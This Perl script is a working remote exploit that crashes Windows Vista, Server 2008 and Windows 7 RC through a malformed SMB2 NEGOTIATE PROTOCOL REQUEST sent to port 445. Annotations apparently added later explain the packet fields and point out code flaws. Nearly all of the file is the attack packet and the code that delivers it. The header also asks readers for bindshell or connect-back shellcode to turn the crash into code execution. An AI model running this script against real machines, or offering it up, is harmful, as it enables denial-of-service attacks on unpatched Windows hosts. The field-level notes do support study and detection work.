#!/usr/bin/perl
# Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln
# Bug found by Laurent Gaffié
#
# Description: Unfortunately this SMB2 security issue is specifically due to a MS patch for another SMB2.0 security issue:
# KB942624 (MS07-063)
# Installing only this specific update on Vista SP0 creates the following issue:
# SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
# The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB server, and it's used to identify the SMB
# dialect that will be used for further communication.
#
# System affected: Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.
#
# Ruben Santamarta said (translated from Spanish):
#
# "...this vulnerability DOES ALLOW remote code execution, and likewise opens the possibility of local privilege
# escalation. It must be made clear that for the moment code execution is far from reliable, as is the privilege
# escalation. But this vulnerability should not be considered a mere DoS, because it has the potential to become
# controlled code execution."
#
# Anyone knows how to find a pointer to gain and control remote host? Connect back or bindshell shellcode are welcome!
# Please contact me, oscarbm at gmail dot com
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 19/10/09.
#
# NOTE(review): the script runs without `use strict` / `use warnings`; $hostname and $buffer below are
# undeclared package globals, and nothing checks the socket write or the close. What the script does is
# fully visible here: one TCP connection to port 445 and one SMB1-framed NEGOTIATE PROTOCOL REQUEST
# whose header carries a non-zero "Process ID High" field. The per-field annotations on $buffer are
# there so the packet can be recognised on the wire.

my $VERSAO = '0.1';     # script version; not referenced anywhere else in this file

# Ignore the usual termination signals, so once running the script cannot be interrupted from the
# terminal (Ctrl-C, hangup, TERM). NOTE(review): 'PS' is not a standard signal name — presumably a
# typo; perl reports "No such signal" for it when warnings are enabled.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

# Destination host as shipped: the loopback address. Undeclared package global (no `my`).
$hostname = "127.0.0.1";

# Print the tool banner. The hex escapes decode to plain ASCII:
# "Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln." / "Coded by F-117."
sub banner {
    print ("\x57\x69\x6e\x64\x6f\x77\x73\x20\x56\x69\x73\x74\x61\x2f\x37\x20\x53\x4d\x42\x32\x2e\x30\x20\x4e\x65\x67\x6f\x74\x69\x61\x74\x65\x20\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x20\x52\x65\x6d\x6f\x74\x65\x20\x42\x53\x4f\x44\x20\x56\x75\x6c\x6e\x2e\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

# The packet: a 4-byte NetBIOS session-service header followed by a 0x90 (144) byte SMB message.
# The fragment comments are the author's; the 32-byte SMB1 header layout (MS-CIFS) is added for
# reference. The byte count of the fragments after the first was checked: 144, matching the
# NetBIOS length field, and the ByteCount field (0x6d = 109) matches the dialect list that follows it.
$buffer="\x00\x00\x00\x90".                                          # NetBIOS session message, length 0x90
# Begin SMB header:
"\xff\x53\x4d\x42".                                                  # protocol id "\xffSMB" (author: "Server Component: SMB")
"\x72\x00\x00\x00".                                                  # command 0x72 = NEGOTIATE, first 3 status bytes (author: "Negotiate Protocol")
"\x00\x18\x53\xc8".                                                  # last status byte, flags 0x18, flags2 0xc853 (author: "Operation 0x18 & sub 0xc853")
"\x00\x26".                                                          # Process ID High: --> :) normal value should be "\x00\x00"
                                                                     #   (the malformed field: a non-zero PID High on a NEGOTIATE
                                                                     #    request is what a network signature for this packet keys on)
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".          # signature (8 bytes), reserved (2), TID 0xffff, PID low 0xfeff
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".          # UID, MID, WordCount 0, ByteCount 0x6d (109), then the dialect list:
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".          #   "PC NETWORK PROGRAM 1.0"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".          #   "LANMAN1.0"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".          #   "Windows for Workgroups 3.1a"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".          #   "LM1.2X002"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".          #   "LANMAN2.1"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".          #   "NT LM 0.12"
"\x30\x30\x32\x00";                                                  #   "SMB 2.002" — presumably what hands the request to the
                                                                     #   SMB2 driver (SRV2.SYS) named in the header; not verified here

banner();

# `use` is compile-time, so IO::Socket is loaded before any of the statements above run,
# regardless of its position in the file.
use IO::Socket;

# One TCP connection to the SMB port. NOTE(review): indirect object syntax; the conventional,
# unambiguously parsed form is IO::Socket::INET->new(...).
my $sock = new IO::Socket::INET (
    PeerAddr => $hostname,
    PeerPort => '445',
    Proto => 'tcp',
);
die "[x] Error: $!\n" unless $sock;

# Single unchecked write of the 148-byte packet: a short write or a connection reset is not
# reported, and the message below is printed whether or not anything was delivered.
print $sock $buffer;
print ("[+] $hostname was attacked. Now BSoD will appear...\n\n");
close($sock);   # return value ignored